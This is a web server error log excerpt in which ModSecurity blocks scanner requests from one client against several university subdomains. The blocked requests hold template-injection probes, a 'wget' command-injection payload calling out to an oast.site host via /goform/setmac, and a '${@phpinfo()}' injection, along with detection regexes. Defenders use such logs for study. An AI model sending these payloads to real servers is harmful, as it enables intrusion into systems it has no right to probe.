[Tue Aug 29 11:31:55.397614 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAPiBnMAAAAB"]
[Tue Aug 29 11:31:55.412983 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQJWyQAAAAr"]
[Tue Aug 29 11:31:55.415934 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAQV4Q4AAAA3"]
[Tue Aug 29 11:31:55.416266 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAPDn-gAAAAP"]
[Tue Aug 29 11:31:55.459566 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAPiBnYAAAAB"]
[Tue Aug 29 11:31:56.327645 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQNwKgAAAAv"]
[Tue Aug 29 11:31:56.333650 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAAQkBZYAAAAC"]
[Tue Aug 29 11:31:56.351194 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAANsAWIAAAAD"]
[Tue Aug 29 11:31:56.358910 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQMrxwAAAAu"]
[Tue Aug 29 11:31:56.359837 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgktpgkb3zh4amb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQV4RIAAAA3"]
[Tue Aug 29 11:31:56.372176 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQR49UAAAAz"]
[Tue Aug 29 11:31:56.373527 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgfwy3zom8jchay.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAPiBnkAAAAB"]
[Tue Aug 29 11:31:56.379088 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg4zd1pwuengur5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAPDn-4AAAAP"]
[Tue Aug 29 11:31:56.382247 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg5d6zmhnqsz7z6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAP6NRIAAAAQ"]
[Tue Aug 29 11:31:56.415168 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg5chyidr6corrb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQMrx4AAAAu"]
[Tue Aug 29 11:31:57.327922 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAPiBn4AAAAB"]
[Tue Aug 29 11:31:57.336514 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAP5mM8AAAAM"]
[Tue Aug 29 11:31:57.337711 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQkBZ0AAAAC"]
[Tue Aug 29 11:31:57.351467 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAPiBn8AAAAB"]
[Tue Aug 29 11:31:57.376995 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAQOv48AAAAw"]
[Tue Aug 29 11:31:57.394693 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg65dcqfmr9i4mh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vcCo-f0AAANsAWkAAAAD"]
[Tue Aug 29 11:31:57.423231 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAPiBoIAAAAB"]
[Tue Aug 29 11:31:58.303544 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQV4RoAAAA3"]
[Tue Aug 29 11:31:58.305746 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQnF6oAAAAF"]
[Tue Aug 29 11:31:58.308773 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQMryYAAAAu"]
[Tue Aug 29 11:31:58.309684 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAPiBoQAAAAB"]
[Tue Aug 29 11:31:58.346119 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQR4@AAAAAz"]
[Tue Aug 29 11:31:58.357181 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAQNwLQAAAAv"]
[Tue Aug 29 11:31:58.358995 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 